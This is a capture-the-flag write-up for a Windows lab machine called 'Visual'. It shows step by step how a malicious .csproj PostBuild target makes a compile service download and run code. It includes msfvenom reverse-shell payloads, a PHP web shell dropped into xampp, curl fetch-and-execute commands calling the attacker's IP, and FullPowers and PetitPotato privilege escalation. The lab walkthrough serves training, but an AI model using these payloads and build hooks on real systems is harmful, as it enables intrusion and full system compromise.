Visual
- Date Completed: 2023-10-06
- Difficulty: Medium
- OS: Windows
User flag
Initial nmap:
$ nmap -p- 10.10.11.234
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-04 22:45 CDT
Nmap scan report for 10.10.11.234
Host is up (0.10s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 506.14 seconds
There's only the http port open on this box. If we take a look at it, it seems to be a page that will take a link to a git repository and compile the code in the repository. It puts emphasis on the .sln file, so that's likely to be the exploitable part:
Simply provide us with your Git Repo link, and we'll handle the rest. Our cutting-edge technology compiles your projects and sends back the executable or DLL files you need, effortlessly and efficiently. We currently support .NET 6.0 and C# programs, so make sure your Git Repo includes a .sln file for successful compilation. Trust Visual to simplify and streamline your project compilation process like never before.
I first tried using git daemon to and input the git:// url into the site, but unfortunately it doesn't support the git protocol.
I next installed cgit following the instructions at https://wiki.archlinux.org/title/Cgit with a few changes:
- Use
/etc/apache2/apache2.confinstead of/etc/httpd/conf/httpd.conf - Add the below lines to
/etc/cgitrc:
scan-path=/data/git/
enable-http-clone=1
clone-url "http://$HTTP_HOST$SCRIPT_NAME/$CGIT_REPO_URL"
I could then have the site access and build projects located in /data/git/
Then I installed Visual Studio Community 2022 on a Windows VM.
I created a new console app, and selected .NET 6.0 . I created a git repo and added all the files in the project to it, then copied it to the /data/git directory on the machine running cgit.
I uploaded the repo and it built successfully.
I then added a post-build script to the project, and it showed up in the .csproj file with the following contents:
<Target Name="PostBuild" AfterTargets="PostBuildEvent">
<Exec Command="curl.exe 10.10.14.222:8080/index.html" />
</Target>
I started a python http server with python3 -m http.server 8080 and uploaded the project with the new changes. I then received a GET request, so that's code execution.
I then created a reverse shell with
msfvenom --payload cmd/windows/reverse_powershell lhost=10.10.14.222 lport=4444 > out.bat
And changed the build script to:
<Target Name="PostBuild" AfterTargets="PostBuildEvent">
<Exec Command="curl.exe 10.10.14.222:8080/out.bat -o out.bat" />
<Exec Command="call out.bat" />
</Target>
I then caught the reverse shell with
nc -lvnp 4444
And was able to get the user flag from their Desktop folder.
Root flag
Looking at C:\Users\enox\Documents\compile.ps1, we can see that the system is using xampp, which uses the Apache webserver.
Searching for the service:
wmic service get name,displayname,pathname,startmode |findstr /i "Apache"
Then showing details about it:
sc qc ApacheHTTPServer
Looks like it's running as the NT AUTHORITY\Local Service user, and it might be possible to escalate from there. We'll create a php payload and drop it in C:\xampp\htdocs\:
msfvenom --payload php/reverse_php lhost=10.10.14.222 lport=4445 > out.php
curl.exe 10.10.14.222:8080/out.php -o out.php
Then open the page in a browser to call the php reverse shell.
Once we've opened the php shell, we'll want to send another reverse shell so that we can preserve state between commands, so close the shell on port 4444 and run:
curl.exe 10.10.14.222:8080/out.bat -o out.bat
out.bat
Then catch the shell on port 4444.
We are now the nt authority\local service user, which usually has impersonation privileges which would allow us to privesc. See this presentation for more information about how this works.
On running whoami /priv, it turns out that we don't have SeImpersonatePrivilege, which is needed for escalation. Luckily, there's a way to get that back. I downloaded FullPowers.exe from the post's linked github, then transferred it to the box:
curl.exe 10.10.14.222:8080/FullPowers.exe -o f.exe
f.exe
We now have all privileges needed to escalate to system.
I first tried using sweet potato to escalate, but I had no luck with it. After several older potatoes I saw referenced, I decided to use google to find new ones:
site:github.com windows exploit potato after:2022-01-01
One of the results I got from that was petit potato, which worked! Here's the command I ran:
curl.exe 10.10.14.222:8080/PetitPotato.exe -o p.exe
p.exe 3 cmd
I then had a shell as nt authority\system and was able to get the root flag!